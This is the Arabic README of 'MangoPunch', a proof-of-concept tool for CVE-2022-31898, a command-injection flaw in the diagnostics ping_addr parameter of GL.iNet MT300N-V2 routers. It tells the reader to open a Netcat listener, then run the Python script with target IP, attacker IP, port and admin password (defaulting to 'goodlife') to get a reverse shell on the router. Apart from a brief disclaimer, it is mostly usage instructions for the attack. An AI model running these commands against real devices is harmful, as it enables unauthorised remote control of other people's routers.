
أداة حقن الأوامر المُصادَق عليها (CVE-2022-31898) - HACKCONRD 2026.
__ __ _____ _
| \/ | | __ \ | |
| \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__
| |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \
| | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | |
|_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_|
__/ |
|___/
يحتوي هذا المستودع على إثبات مفهوم (PoC) تقني لثغرة تنفيذ الأوامر عن بُعد (RCE) تم اكتشافها في أجهزة GL.iNet MT300N-V2 (Mango) وغيرها من الطرازات التي تعمل بإصدارات البرنامج الثابت الأقل من 3.215.
توجد الثغرة في معامل ping_addr الخاص بواجهة برمجة تطبيقات التشخيص، مما يسمح لمهاجم مُوثَّق بتنفيذ أوامر نظام عشوائية عبر رموز الصدفة (;).
افتح طرفية في جهاز المهاجم (Kali Linux) وابدأ مستمع Netcat:
nc -lvnp 9292
استخدم الأمر التالي لتشغيل الصدفة العكسية:
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>
| الخيار | الاسم الكامل | الوصف | الافتراضي |
|---|---|---|---|
-R | --rhost | عنوان IP الهدف البعيد (الموجّه) | مطلوب |
-P | --rport | منفذ إدارة الويب | 443 |
-L | --lhost | عنوان IP المستمع (Kali/المهاجم) | مطلوب |
-l | --lport | منفذ المستمع | مطلوب |
-p | --pwd | كلمة مرور المسؤول | goodlife |
-t | --https | تفعيل HTTPS | False |
إخلاء مسؤولية: هذه الأداة مخصصة للأغراض التعليمية واختبارات الأمان المصرّح بها فقط. المؤلف غير مسؤول عن أي إساءة استخدام. MangoPunch: CVE-2022-31898